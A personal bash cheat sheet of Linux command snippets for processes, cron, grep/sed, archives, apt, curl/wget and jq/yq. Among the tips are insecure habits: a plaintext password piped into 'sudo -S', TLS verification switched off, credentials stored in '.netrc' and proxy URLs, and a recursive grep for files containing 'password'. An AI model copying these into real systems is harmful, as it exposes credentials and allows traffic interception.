install without sudo rpm without sudo

rpm -ivh --prefix=$HOME browsh_1.6.4_linux_amd64.rpm

jobs

fg, bg, jobs

stop process and start it into background

ctrl-Z
bg

stop process and resume it, disconnect from process and leave it running

ctrl-Z
fg

resume process by number into list 'jobs'

fg 2

shell replacing, redirect output to file, fork new process start

bash
exec > output-file.txt
date
# the same as 'exit'
exec <&-
cat output-file.txt

output to file with variable, output to variable

gen_version="5.2.1"
$(find /mapr/dp.prod/vantage/data/processed/gen/$gen_version/ -maxdepth 5 -mindepth 5 | awk -F '/' '{print $14}' > gt-$gen_version.list)

execute command and exit

bash
exec ls -la

execute command from string, execute string, run string

echo "ls" | xargs -i sh -c "{}"

xargs with multiple arguments

find . | xargs -I % sh -c 'md5sum %; ls -la %;'

run clear/naked/without_scripts/empty/zero terminal without bashrc

bash --norc --noprofile

capture terminal output to file, save output of the commands to file, save log/history of terminal output

script output-file-name.txt

{my commands }

exit
cat output-file-name.txt

disconnect from terminal and let command be runned

ctrl-Z
disown -a && exit

postponed execution, execute command by timer, execute command from now, timer command

for graphical applications DISPLAY must be specified

  • using built-in editor
at now + 5 minutes
at> DISPLAY=:0 rifle /path/to/image
^D
  • using inline execution
echo "DISPLAY=:0 rifle /path/to/image/task.png" | at now + 1 min
echo "DISPLAY=:0 rifle /path/to/image/task.png" | at 11:01

print all files that process is reading

strace -e open,access <command to run application>

find process by name

ps fC firefox
pgrep firefox

pid of process by name

pidof <app name>
pidof chrome

process by id

ll /proc/${process_id}
# process command line
cat /proc/${process_id}/cmdline

current process id parent process id

echo $$
echo ${PPID}

process list, process tree

# process list with hierarchy 
ps axjf
ps -ef --forest
ps -fauxw

# process list full command line, ps full cmd
ps -efww

# list of processes by user
ps -ef -u my_special_user

process list without ps

links to processes

ls -l /proc/*/exe
ls -l /proc/*/cwd
cat /proc/*/cmdline

process full command, ps full, ps truncate

ps -ewwo pid,cmd

threads in process

ps -eww H -p $PROCESS_ID

windows analogue of 'ps aux'

wmic path win32_process get Caption, Processid, Commandline

kill -3 {pid}

send SIGQUIT: a JVM writes a thread dump to its log; a plain process is stopped with a core dump

remove except one file

# requires: shopt -s extglob
rm -rf -- !(exclude-filename.sh)

cron

You have to escape the % signs with \%. Where the crontab file is located:

sudo less /var/spool/cron/crontabs/$USER

cron activating

sudo service cron status

all '%' symbols must be escaped as '\%'

# edit file 
# !!! last line should be empty !!!
crontab -e
# list of all jobs
crontab -l

adding file with cron job

echo " * * * * echo `date` >> /out.txt" >> print-date.cron
chmod +x print-date.cron
crontab print-date.cron

example of cron job with special parameters

HOME=/home/ubuntu
0 */6 * * * /home/ubuntu/list-comparator-W3650915.sh >/dev/null 2>&1
9 */6 * * * /home/ubuntu/list-comparator-W3653989.sh >/dev/null 2>&1
# each 6 hours in specific hour
25 1,7,13,19 * * * /home/ubuntu/list-comparator-W3651439.sh >/dev/null 2>&1

logs

sudo tail -f /var/log/syslog

is cron running

ps -ef | grep cron | grep -v grep

start/stop/restart cron

systemctl start cron
systemctl stop cron
systemctl restart cron

skip first line, pipe skip line

# skip first line in output
docker ps -a | awk '{print $1}' | tail -n +2

error to null

./hbase.sh 2>/dev/null

stderr to stdout, error to out

sudo python3 echo.py > out.txt 2>&1 &
sudo python3 echo.py &> out.txt &
sudo python3 echo.py > out.txt &

grep with line number

grep -nr "text for search" .

grep only in certain folder without recursion, grep current folder, grep in current dir

# need to set * or mask for files in folder !!!
grep -s "search_string" /path/to/folder/*
sed -n 's/^search_string//p' /path/to/folder/*

# grep in current folder
grep -s "search-string" * .*

grep before

grep -B 4
grep --before 4

grep after

grep -A 4
grep --after 4
printf "# todo\n## one\n### description for one\n## two\n## three" | grep "[#]\{3\}"
# printf is sensitive to --- strings
### grep boundary between two numbers
printf "# todo\n## one\n### description for one\n## two\n## three" | grep "[#]\{2,3\}"
printf "# todo\n## one\n### description for one\n## two\n## three" | grep --extended-regexp "[#]{3}"
### grep regexp 
## characters
# [[:alnum:]]	All letters and numbers.	"[0-9a-zA-Z]"
# [[:alpha:]]	All letters.	                "[a-zA-Z]"
# [[:blank:]]	Spaces and tabs.         	[CTRL+V<TAB> ]
# [[:digit:]]	Digits 0 to 9.	                [0-9]
# [[:lower:]]	Lowercase letters.	        [a-z]
# [[:punct:]]	Punctuation and other characters.	"[^a-zA-Z0-9]"
# [[:upper:]]	Uppercase letters.	        [A-Z]
# [[:xdigit:]]	Hexadecimal digits.	        "[0-9a-fA-F]"
	
## quantifiers
# *	Zero or more matches.
# ?	Zero or one match.
# +	One or more matches.
# {n}	n matches.
# {n,}	n or more matches.
# {,m}	Up to m matches.
# {n,m}	From n up to m matches.
du -ah .  | sort -r | grep -E "^[0-9]{2,}M"

grep between, print between lines

oc describe pod/gateway-486-bawfps | awk '/Environment:/,/Mounts:/'

grep text into files

grep -rn '.' -e '@Table'
grep -ilR "@Table" .

grep OR operation

cat file.txt | grep -e "occurence1" -e "occurence2"
cat file.txt | grep -e "occurence1\|occurence2"

grep AND operation

cat file.txt | grep -e "occurence1.*occurence2"

grep not included, grep NOT

cat file.txt | grep -v "not-include-string"
cat file.txt | grep -v -e "not-include-string" -e "not-include-another"

grep with file mask

grep -ir "memory" --include="*.scala"

grep with regexp, grep regexp

grep -ir --include=README.md ".*base" 2>/dev/null
echo "BN_FASDLT/1/20200624T083332_20200624T083350_715488_BM60404_BN_FASDLT.MF4" | awk -F "/" '{print $NF}' | grep "[0-9]\{8\}"
echo "185.43.224.157" | grep '^[0-9]\{1,3\}\.'
echo "185.43.224.157" | egrep '^[0-9]{1,3}\.'
echo "185.43.224.157" | egrep '^[0-9][0-9]+[0-9]+\.'

grep with filename

grep  -rH -A 2 "@angular/core"

grep without permission denied

grep -ir --include=README.md "base" 2>/dev/null

grep filename, grep name

grep -lir 'password'

inner join for two files, compare string from different files

grep -F -x -f path-to-file1 path-to-file2
grep --fixed-strings --line-regexp -f path-to-file1 path-to-file2
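
a tiny worked example ( /tmp paths are just for illustration ):

printf "a\nb\nc\n" > /tmp/file1
printf "b\nc\nd\n" > /tmp/file2
grep -F -x -f /tmp/file1 /tmp/file2
# prints the lines present in both files: b, c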

difference between two files without spaces

diff -w file1.txt file2.txt

show difference in lines with context

diff -c file1.txt file2.txt

show equal lines ( reverse diff )

fgrep -xf W3651292.sh W3659261.sh

show difference between two dates, date difference, time difference

apt install dateutils
dateutils.ddiff -i '%Y%m%d%H%M%S' -f '%y %m %d %H %M %S' 20160312000101 20170817040001

adjust time, adjust clock, sync clock, computer clock

/etc/systemd/timesyncd.conf.d/90-time-sync.conf

[Time]
NTP=ntp.ubuntu.com
FallbackNTP=ntp.ubuntu.com

restart time sync service

timedatectl set-ntp true && systemctl restart systemd-timesyncd.service

replace character into string

array=$( echo $result | tr '{},' ' ' )

change case of chars ( upper, lower )

echo "hello World" | tr '[:lower:]' '[:upper:]

delete all chars except letters

echo "hello World 1234 woww" | tr -dc 'a-zA-Z'

replace text in all files of current directory, replace inline, replace inplace, inline replace, sed inplace

sed --in-place 's/LinkedIn/Yahoo/g' *
# replace tab symbol with comma symbol
sed --in-place 's/\t/,/g' one_file.txt

# in case of error like: couldn't edit ... not a regular file
grep -l -r "LinkedIn" | xargs sed --in-place s/LinkedIn/Yahoo/g

# sed for folder sed directory sed for files
find . -type f -exec sed -i 's/import com.fasterxml.jackson.module.scala.DefaultScalaModule;//p' {} +

no editor replacement, no vi no vim no nano, add line without editor, edit property without editor

# going to add new line in property file without editor
sed --in-place 's/\[General\]/\[General\]\nenable_trusted_host_check=0/g' matomo-php.ini

timezone

timedatectl | grep "Time zone"
cat /etc/timezone

date formatting, datetime formatting, timestamp file, file with timestamp

# print current date
date +%H:%M:%S:%s
# print date with timestamp
date -d @1552208500 +"%Y%m%dT%H%M%S"
date +%Y-%m-%d-%H:%M:%S:%s
# output file with currenttime file with currenttimestamp
python3 /imap-message-reader.py > message_reader`date +%H:%M:%S`.txt

timestamp to T-date

function timestamp2date(){
    date -d @$(( $1/1000000000 )) +"%Y%m%dT%H%M%S"
}
timestamp2date 1649162083168929800

generate random string

openssl rand -hex 30
# or 
cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 8 | tr '[:upper:]' '[:lower:]' | head -n 1

find inside zip file(s), grep zip, zip grep

zgrep "message_gateway_integration" /var/lib/brand-server/cache/zip/*.zip

grep zip, find inside zip, inside specific file line of text

ls -1 *.zip | xargs -I{} unzip -p {} brand.xml  | grep instant-limit | grep "\\."

unzip into specific folder

unzip file.zip -d output_folder

unzip without asking for action

unzip -o file.zip -d output_folder

unzip one file

unzip -l $ARCHIVE_NAME
unzip $ARCHIVE_NAME path/to/file/inside

7zip

sudo apt install p7zip-full

7za l archive.7z
7za x archive.7z	

tar archiving tar compression

# tar create
tar -cf jdk.tar 8.0.265.j9-adpt
# tar compression
tar -czvf jdk.tar.gz 8.0.265.j9-adpt

untar

# tar list of files inside
tar -tf jdk.tar

# tar extract untar
tar -xvf jdk.tar -C /tmp/jdk
# extract into destination with removing first two folders
tar -xvf jdk.tar -C /tmp/jdk --strip-components=2
# extract from URL untar from url
wget -qO- https://nodejs.org/dist/v10.16.3/node-v10.16.3-linux-x64.tar.xz | tar -xJ -f - -C /target/directory

pipeline chain 'to file'

echo "hello from someone" | tee --append out.txt
echo "hello from someone" | tee --append out.txt > /dev/null

vi

vi wrap( :set wrap, :set nowrap )
shortcut description
/ search forward
? search backward
n next occurence
N prev occurence

command prompt change console prompt console invitation

.bashrc of ubuntu

export PS1="my_host $(date +%d%m_%H%M%S)>"
if [ "$color_prompt" = yes ]; then
#    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@$(date +%d%m_%H%M)\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '

else
#    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
    PS1='${debian_chroot:+($debian_chroot)}\u:\$(date +%d.%m_%H:%M)\w\$ '

fi
unset color_prompt force_color_prompt
export PROMPT_COMMAND="echo -n \[\$(date +%H:%M:%S)\]\ "

command line color prompt color console

# red
export PS1=`printf "\033[31m$ staging \033[39m"`
# green
export PS1=`printf "\033[32m$ staging \033[39m"`
Color	Foreground	Background
Black	\033[30m	\033[40m
Red	\033[31m	\033[41m
Green	\033[32m	\033[42m
Orange	\033[33m	\033[43m
Blue	\033[34m	\033[44m
Magenta	\033[35m	\033[45m
Cyan	\033[36m	\033[46m
Light gray	\033[37m	\033[47m
Fallback to distro's default	\033[39m	\033[49m

last executed exit code

echo $?
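
# usage sketch: branch on the exit code of the previous command
grep -q root /etc/passwd
if [ $? -eq 0 ]; then echo "found"; else echo "not found"; fi
# or shorter
grep -q root /etc/passwd && echo "found" || echo "not found"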

memory dump

cat /proc/meminfo

memory limit memory usage

cat /sys/fs/cgroup/memory/memory.limit_in_bytes
cat /sys/fs/cgroup/memory/memory.usage_in_bytes

max open files

cat /proc/sys/fs/file-max

open file by type, open image

mimetype -d {filename}
xdg-open {filename}
w3m {filename}

open in browser, open url

sensible-browser http://localhost:3000/api/status
x-www-browser http://localhost:3000/api/status
# for MacOS
open http://localhost:3000/api/status

wget post

wget --method=POST http://{host}:9000/published/resources/10050001.zip
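
# wget post with a request body ( assuming GNU wget >= 1.15 which supports --body-data; endpoint is just an example )
wget --method=POST --header='Content-Type: application/json' --body-data='{"key":"value"}' -O- http://{host}:9000/api/endpoint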

wget to console

wget -O- http://{host}:8500/wd-only/getBrandXml.jsp?brand=229099017 > /dev/null  2>&1

wget to console without additional info

wget -nv -O- http://{host}:8500/wd-only/getBrandXml.jsp?brand=229099017 2>/dev/null

wget to specific file, download file to specific file

wget -O out.zip http://{host}:9000/published/resources/10050001.zip
# in case of complex output path
curl -s http://{host}:9000/published/resources/10050001.zip --create-dirs -o /home/path/to/folder/file.zip

wget to specific folder

wget http://host:9090/wd-only/1005000.zip --directory-prefix="/home/temp/out"

wget https without checking certificate

wget --no-check-certificate https://musan999999.mueq.adas.intel.com:8888/data-api/session/

wget with user wget with credentials

wget --user $ARTIFACTORY_USER --password $ARTIFACTORY_PASS $ARTIFACTORY_URL

wget with specific timeout

wget --tries=1 --timeout=5 --no-check-certificate https://musan999999.mueq.adas.intel.com:8888/data-api/session/

wget proxy, wget via proxy

wget -e use_proxy=yes -e http_proxy=127.0.0.1:7777 https://mail.ubsgroup.net/

or just with settings file "~/.wgetrc"

use_proxy = on
http_proxy =  http://username:[email protected]:port/
https_proxy =  http://username:[email protected]:port/
ftp_proxy =  http://username:[email protected]:port/

or via socks5

all_proxy=socks5://proxy_host:proxy_port wget https://mail.ubsgroup.net

zip files, zip all files

zip -r bcm-1003.zip *

zip file with password zip protect with password

zip --encrypt 1.zip 1.html

zip file without saving path, zip path cleanup

zip --junk-paths bcm-1003.zip *

using parameters for aliases

alias sublime_editor=/Applications/SublimeEditor/Sublime

subl(){
  sublime_editor "$1" &
}

print alias, print function

alias sublime_editor
type subl

sed cheat sheet, sed replace

replace "name" with "nomen" string
sed 's/name/nomen/g'

# replace only second occurrence
# echo "there is a test is not a sentence" | sed 's/is/are/2'

example of replacing all occurrences in multiple files

for each_file in `find -iname "*.java"`; do
	sed --in-place 's/vodkafone/cherkavi/g' $each_file
done

sed add prefix add suffix replace in line multiple commands

echo "aaaa find_string bbbb " | sed 's/find_string/replace_to/g' | sed 's/"//g; s/$/\/suffix/; s/^/\/prefix/'
# remove line with occurence
sed --in-place '/.*jackson\-annotations/d' $each_file

print line by number from output, line from pipeline, print one line from file

locate -ir "/zip$" | sed -n '2p'
cat out.txt | sed -n '96p'

issue with windows/unix carriage return

/usr/bin/bash^M: bad interpreter: No such file or directory

solution

sed -i -e 's/\r$//' Archi-Ubuntu.sh 

calculate amount of strings

ps -aux | awk 'BEGIN{a=0}{a=a+1}END{print a}'

boolean value

true
false

last changed files, last updated file

find -cmin -2

temp file temporary file create temp file

mktemp

chmod recursively

chmod -R +x <folder name>

# remove world access 
chmod -R o-rwx /opt/sm-metrics/grafana-db/data
# remove group access
chmod -R g-rwx /opt/sm-metrics/grafana-db/data
# add rw access for current user
chmod u+rw screenshot_overlayed.png
find . -iname "*.sql" -print0 | xargs -0 chmod 666

create dozen of folders using one-line command

mkdir -p some-folder/{1..10}/{one,two,three}

execute command with environment variable, new environment variable for command

ONE="this is a test"; echo $ONE

activate environment variables from file, env file, export env, export all env, all variable from file, all var export, env var file

FILE_WITH_VAR=.env.local
source $FILE_WITH_VAR
export $(cut -d= -f1 $FILE_WITH_VAR)

# if you have comments in file
source $FILE_WITH_VAR
export `cat $FILE_WITH_VAR | awk -F= '{if($1 !~ "#"){print $1}}'`
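
# alternative sketch: let `source` export everything it defines ( allexport )
set -a
source $FILE_WITH_VAR
set +a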

system log file

/var/log/syslog

Debian install package via proxy, apt install proxy, apt proxy, apt update proxy

sudo http_proxy='http://user:@proxy.muc:8080' apt install meld

proxy places, change proxy, update proxy, system proxy

remember about escaping bash spec chars ( $,.@.... )

  • .bashrc
  • /etc/environment
  • /etc/systemd/system/docker.service.d/http-proxy.conf
  • /etc/apt/auth.conf
Acquire::http::Proxy "http://username:password@proxyhost:port";
Acquire::https::Proxy "http://username:password@proxyhost:port";
  • snap
sudo snap set system proxy.http="http://user:[email protected]:8080"
sudo snap set system proxy.https="http://user:[email protected]:8080"
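
if the proxy password contains special characters ( @ : / ... ) percent-encode it first; a minimal sketch with a hypothetical password:

# hypothetical password "p@ss:word" -> percent-encoded form
python3 -c "import urllib.parse; print(urllib.parse.quote('p@ss:word', safe=''))"
# p%40ss%3Aword
export http_proxy="http://username:p%40ss%3Aword@proxyhost:port"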

snap installation issue

# leads to error: cannot connect to the server
snap install <app>

# Unmask the snapd.service:
sudo systemctl unmask snapd.service

# Enable it:
systemctl enable snapd.service

# Start it:
systemctl start snapd.service

install version of app, install specific version, accessible application version

sudo apt list -a [name of the package]
sudo apt list -a kubeadm

install package for another architecture, install x86 on x64

dpkg --add-architecture i386
dpkg --print-architecture
dpkg --print-foreign-architectures
sudo apt-get install libglib2.0-0:i386 libgtk2.0-0:i386

installed package check package information

apt list <name of package>
apt show <name of package>

apt package description

apt-cache show terminator

apt cache

cd /var/cache/apt/archives

apt force install

sudo apt install --fix-broken -o Dpkg::Options::="--force-overwrite" {package name}

package update package mark

apt mark hold kubeadm
# install: this package is marked for installation.
# deinstall (remove): this package is marked for removal.
# purge: this package, and all its configuration files, are marked for removal.
# hold: this package cannot be installed, upgraded, removed, or purged.
# unhold: remove the hold so the package can be installed/upgraded again
# auto: auto installed
# manual: manually installed

Debian update package

sudo apt-get install --only-upgrade {packagename}

Debian list of packages

sudo apt list
sudo dpkg -l
First letter desired package state ("selection state")
u unknown
i install
r remove/deinstall
p purge (remove including config files)
h hold
Second letter current package state
n not-installed
i installed
c config-files (only the config files are installed)
U unpacked
F half-configured (configuration failed for some reason)
h half-installed (installation failed for some reason)
W triggers-awaited (package is waiting for a trigger from another package)
t triggers-pending (package has been triggered)
Third letter error state (you normally shouldn't see a third letter, but a space, instead)
R reinst-required (package broken, reinstallation required)

Debian list the versions available in your repo

sudo apt-cache madison {package name}

Debian install new version of package with specific version

sudo apt-get install {package name}={version}

Debian system cleanup

# clean cache
sudo du -sh /var/cache/apt
sudo apt-get clean

# remove unused packages
sudo apt-get autoremove --purge

# remove old journal records
journalctl --disk-usage
sudo journalctl --vacuum-time=5d

uninstall specific app

sudo apt-get --purge remove {app name}

remove service ( kubernetes )

  • sudo invoke-rc.d localkube stop
  • sudo invoke-rc.d localkube status ( sudo service localkube status )
  • sudo update-rc.d -f localkube remove
  • sudo grep -ir /etc -e "kube"
  • rm -rf /etc/kubernetes
  • rm -rf /etc/systemd/system/localkube.service
  • vi /var/log/syslog

last executed code, last script return value

echo $?

remove VMWare player

sudo vmware-installer -u vmware-player

version of OS linux version os information distribution name OS name

  • lsb_release -a
  • cat /etc/*-release
  • uname -a
  • . /etc/os-release

sudo without password, apple keyboard, sudo script without password

echo 'password' | sudo -S bash -c "echo 2 > /sys/module/hid_apple/parameters/fnmode" 2>/dev/null

default type, detect default browser, mime types, default application set default app

xdg-mime query default x-scheme-handler/http

## where accessible types
# echo $XDG_DATA_DIRS # available applications
# locate google-chrome.desktop
# /usr/share/applications/google-chrome.desktop

## set default browser 
xdg-mime default firefox.desktop x-scheme-handler/http
xdg-mime default firefox.desktop x-scheme-handler/https
xdg-settings set default-web-browser firefox.desktop

## check default association
cat ~/.config/mimeapps.list
cat /usr/share/applications/defaults.list

or change your alternatives

locate x-www-browser
# /etc/alternatives/x-www-browser

open in default browser

x-www-browser http://localhost:9090

alternatives

set default browser

# display
sudo update-alternatives --display x-www-browser
sudo update-alternatives --query x-www-browser
sudo update-alternatives --install /usr/bin/x-www-browser x-www-browser /usr/bin/chromium-browser 90

# config
sudo update-alternatives --config x-www-browser

# remove
sudo update-alternatives --remove x-www-browser /snap/bin/chromium
sudo update-alternatives --remove x-www-browser /usr/bin/chromium

java set default

update-alternatives --install /usr/bin/java java $JAVA_HOME/bin/java 10

open file with default editor, default viewer, with more appropriate viewer

# ranger should be installed 
rifle <path to file>

cat replacement bat

# apt install bat - not working sometimes
cargo install bat
batcat textfile
# alias bat=batcat
bat textfile

install haskell

sudo apt-get install haskell-stack
stack upgrade
stack install toodles

get started with haskell

check architecture

dpkg --add-architecture i386
dpkg --print-architecture
dpkg --print-foreign-architectures

calendar, week number

gcal --with-week-number

cURL command

~/.netrc

machine my-secret-host.com login my-secret-login password my-secret-password
machine my-secret-host2.com login my-secret-login2 password my-secret-password2
curl --netrc --request GET my-secret-host.com/storage/credentials 

return code 0 if 200, curl return code

curl --fail --request GET 'https://postman-echo.com/get?foo1=bar1&foo2=bar2'

curl with authentication

curl --request POST \
--data "client_id=myClient" \
--data "grant_type=client_credentials" \
--data "scope=write" \
--data "response_type=token" \
--cert "myClientCertificate.pem" \
--key "myClientCertificate.key.pem" \
"https://openam.example.com:8443/openam/oauth2/realms/root/access_token"

# {
#   "access_token": "sbQZ....",
#   "scope": "write",
#   "token_type": "Bearer",
#   "expires_in": 3600
# }

echo server mock server

curl --location --request GET 'https://postman-echo.com/get?foo1=bar1&foo2=bar2'

curl username, curl with user and password, curl credentials

curl -u username:password http://example.com
# basic authentication
echo -n "${username}:${password}" | base64
curl -v --insecure -X GET "https://codebeamer.ubsgroup.net:8443/cb/api/v3/wikipages/21313" -H "accept: application/json" -H "Authorization: Basic "`echo -n $TSS_USER:$TSS_PASSWORD | base64`

# bearer authentication
curl --insecure --location --oauth2-bearer $KEYCLOAK_TOKEN "https://portal.apps.devops.vantage.org/session-lister/v1/sessions/cc17d9f8-0f96-43e0-a0dc-xxxxxxx"

# or with certificate 
curl  --cacert /opt/CA.cer --location --oauth2-bearer $KEYCLOAK_TOKEN "https://portal.apps.devops.vantage.org/session-lister/v1/sessions/cc17d9f8-0f96-43e0-a0dc-xxxxxxx"

curl head

curl --head http://example.com

curl redirect, redirect curl, curl 302 response

curl -L http://example.com

curl PUT example with file

curl -X PUT --header "Content-Type: application/vnd.wirecard.brand.apis-v1+json;charset=ISO-8859-1" -H "x-username: cherkavi" [email protected] http://q-brands-app01.wirecard.sys:9000/draft/brands/229099017/model/country-configurations

curl POST example POST request

curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data '{"add":"data"}'

curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data-raw '{"add":"data"}'

curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data-binary '{"add":"data"}'

# encoding special symbols curl special symbols
curl -X POST http://localhost:8983/solr/collection1/update?commit=true \
-H "Content-Type: application/json" --data-urlencode '{"add":"Tom&Jerry"}'

# or with bash variable
SOME_DATA="my_personal_value"
curl -X POST http://localhost:8983/solr/collection1/update?commit=true -H "Content-Type: application/json" --data-binary '{"add":"'$SOME_DATA'"}'

# or with data from file
curl -X POST http://localhost:8983/test -H "Content-Type: application/json" --data-binary '@/path/to/file.json'

# or with multipart body
curl -i -X POST -H "Content-Type: multipart/form-data" -F "[email protected]" -F "userid=1234" http://mysuperserver/media/upload/
# multiline body
curl -X 'POST' $SOME_HOST \
  -H 'accept: application/json' \
  -H 'Content-Type: application/json' \
  -d '{
  "bdcTimestamp": 6797571559111,
  "comment": "Some comment",
  "loggerTimestamp": 1623247031477189001,
  }'
# curl with inline data curl here document curl port document here pipe
json_mappings=`cat some_file.json`
response=`curl -X POST $SOME_HOST -H 'Content-Type: application/json' \
-d @- << EOF
{
	"mappings": $json_mappings,
	"settings" : {
        "index" : {
            "number_of_shards" : 1,
            "number_of_replicas" : 0
        }
    }
}
EOF
`
echo $response
# POST request GET style
curl -X POST "http://localhost:8888/api/v1/notification/subscribe?email=one%40mail.ru&country=2&state=517&city=qWkbs&articles=true&questions=true&listings=true" -H "accept: application/json"

curl escape, curl special symbols

# https://kb.objectrocket.com/elasticsearch/elasticsearch-cheatsheet-of-the-most-important-curl-requests-252
curl -X GET "https://elasticsearch-label-search-prod.vantage.org/autolabel/_search?size=100&q=moto:*&pretty"

escape single quotas

echo "'" 'sentence' "'"

curl without progress, curl silent

curl certificate skipping, curl ssl, curl https, curl skip ssl

curl --insecure -s -X GET http://google.com

curl with additional output, curl verbosive mode

curl --verbose --insecure -s -X GET http://google.com

curl cookie, curl header cookie

chrome extension cookies.txt

# send predefined cookie to url
curl -b path-to-cookie-file.txt -X GET url.com

# send cookie from command line
curl --cookie "first_cookie=123;second_cookie=456;third_cookie=789" -X GET url.com

# send cookie from command line 
curl 'http://localhost:8000/members/json-api/auth/user' -H 'Cookie: PHPSESSID=5c5dddcd96b9f2f41c2d2f87e799feac'

# collect cookie from remote url and save in file
curl -c cookie-from-url-com.txt -X GET url.com

curl binary

python3 ${HOME_PROJECTS_GITHUB}/python-utilities/html-scraping/binary-html/beautifulsoup.py https://amazon.de

string encoding for http

sudo apt install gridsite-clients
urlencode "- - -"

curl with encoding to another codepage, translate/convert from win1251 to utf8

curl "http://some.resource/read_book.php?id=66258&p=1" | iconv --from-code WINDOWS-1251 --to-code UTF-8

iconv --list
cat "$INPUT_FILE" | iconv -t UNICODE//IGNORE

curl status code, curl response code, curl duration

airflow_trigger(){
  SESSION_ID=$1
  ENDPOINT=$2
  BODY='{"conf":{"session_id":"'$SESSION_ID'","branch":"merge_labels"}}'
  curl --silent -w "response-code: %{http_code}\n   time: %{time_starttransfer}" --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
  return $?
}
DAG_NAME='labeling'
airflow_trigger $each_session "https://airflow.vantage.org/api/experimental/dags/$DAG_NAME/dag_runs"
curl --show-error "http://some.resource/read_book.php?id=66258&p=1"

curl execution time

curl --max-time 10 -so /dev/null -w '%{time_total}\n' google.com

curl script curl replacement

curl "https://{foo,bar}.com/file_[1-4].webp" --output "#1_#2.webp"

json

# installation 
pip3 install jc
apt-get install jc

# parse general output to json
jc --pretty ls -la
# using predefined parser
dig www.google.com | jc --dig --pretty
echo '{"a": 10, "b": "kitchen"}' | spyql -Otable=my_table "SELECT  json.a as indicator_value, json.b as place FROM json TO sql" 
echo '{"loggerTimestamp": 1657094097468421888}' | jq .
# {
#  "loggerTimestamp": 1657094097468422000
# }

jq is not working properly with "-" character in property name !!!
jq is not working sometimes with "jq any properties", need to split them to two commands

docker network inspect mysql_web_default | jq '.[0].Containers' | jq .[].Name
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | \
jq ".[] | .name"

# json output pretty print, json pretty print, json sort
cat output.json | jq .
# sort by keys
cat output.json | jq -S .

# jq select with condition
jq -e 'select(.[].name == "CP_END")' $SESSION_METADATA_FOLDER/$SESSION_ID
echo $? # return 0 only when met the condition, otherwise - 1

# .repositories[].repositoryName
aws ecr describe-repositories | jq '.repositories[] | select(.repositoryName == "cherkavi-udacity-github-action-fe")'

# jq filter by condition
docker network inspect mysql_web_default | jq '.[0].Containers' | jq '.[] | select(.Name=="web_mysql_ui")' | jq .IPv4Address

# jq create another document filter json transform json
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq '[.[] | {id, name} ]'
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq '[.[] | {number:.id, warrior:.name} ]'
	
# jq convert to csv
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | \
jq '.[] | if .name == "Richard" then . else empty end | [.id, .name] | @csv'

# jq as a table
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq -r '["ID","NAME"], ["--","------"], (.[] | [.id,.name]) | @tsv' 
	
# jq get first element
echo '[{"id": 1, "name": "Arthur", "age": "21"},{"id": 2, "name": "Richard", "age": "32"}]' | jq '.[0] | [.name, .age] | @csv'

# convert from yaml to json, retrieve values from json, convert to csv
cat temp-pod.yaml | yq r - -j --prettyPrint | jq '[.metadata.namespace, .metadata.name, .spec.template.spec.nodeSelector."kubernetes.io/hostname"] | @csv'

# multiply properties from sub-element
aws s3api list-object-versions --bucket $AWS_S3_BUCKET_NAME --prefix $AWS_FILE_KEY | jq '.Versions[] | [.Key,.VersionId]'

echo '{"smart_collections":[{"id":270378401973},{"id":270378369205}]}' | jq '. "smart_collections" | .[] | .id'

jq 'if .attributes[].attribute == "category" and (.attributes[].normalizedValues != null) and (.attributes[].normalizedValues | length )>1 then . else empty end'
	
# jq remove quotas raw text
jq -r ".DistributionList.Items[].Id"

# jq escape symbols
kubectl get nodes -o json | jq -r '.items[].metadata.annotations."alpha.kubernetes.io/provided-node-ip"'

# edit variables inside JSON file
ENV_DATA=abcde
jq --arg var_a "$ENV_DATA" '.ETag = $var_a' cloud_front.json
jq '.Distribution.DistributionConfig.Enabled = false' cloud_front.json

json compare json diff

cmp <(jq -cS . A.json) <(jq -cS . B.json)
diff <(jq --sort-keys . A.json) <(jq --sort-keys . B.json)
# export JSON_COMPARE_SUPPRESS_OUTPUT=""
export JSON_COMPARE_SUPPRESS_OUTPUT="true"
python3 jsoncompare.py  $FOLDER_CSV/$SESSION_ID $FOLDER/$SESSION_ID

yaml

pip install yamlpath

yaml get value by xpath

echo '
first: 
  f_second: one_one
second: 2
' | yaml-get -p first.f_second
# one_one

yaml search for xpath, print files with values in xpath

echo '
first: 
  f_second: one_one
second: 2
' | yaml-paths --search=%one

yaml edit by xpath ( scalars only )

echo '
first: one
second: 2 
' | yaml-set -g first --value=1
# ---
# first: 1
# second: 2

yaml difference between two yaml files

echo '
second: 2
first: 
  f_second: one_one
' > temp_1.yaml
echo '
first: 
  f_second: one_two
second: 2
' > temp_2.yaml
yaml-diff temp_1.yaml temp_2.yaml
# < "one_one"
# ---
# > "one_two"
# read value
cat k8s-pod.yaml | yq r - --printMode pv  "metadata.name"

# convert to JSON
cat k8s-pod.yaml | yq r - -j --prettyPrint
# convert yaml to json|props|xml|tsv|csv
cat k8s-pod.yaml | yq --output-format json

# yaml remove elements clear ocp fields
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.spec.clusterIP,.spec.clusterIP)' service-data-api-mdf4download-service.yaml

# yaml editor 
yq 'del(.metadata.managedFields,.status,.metadata.uid,.metadata.resourceVersion,.metadata.creationTimestamp,.spec.clusterIP,.spec.clusterIP),(.metadata.namespace="ttt")' service-data-api-mdf4download-service.yaml

yq converter

# convert yaml to json|props|xml|tsv|csv
cat file.yaml | yq --output-format json

xml

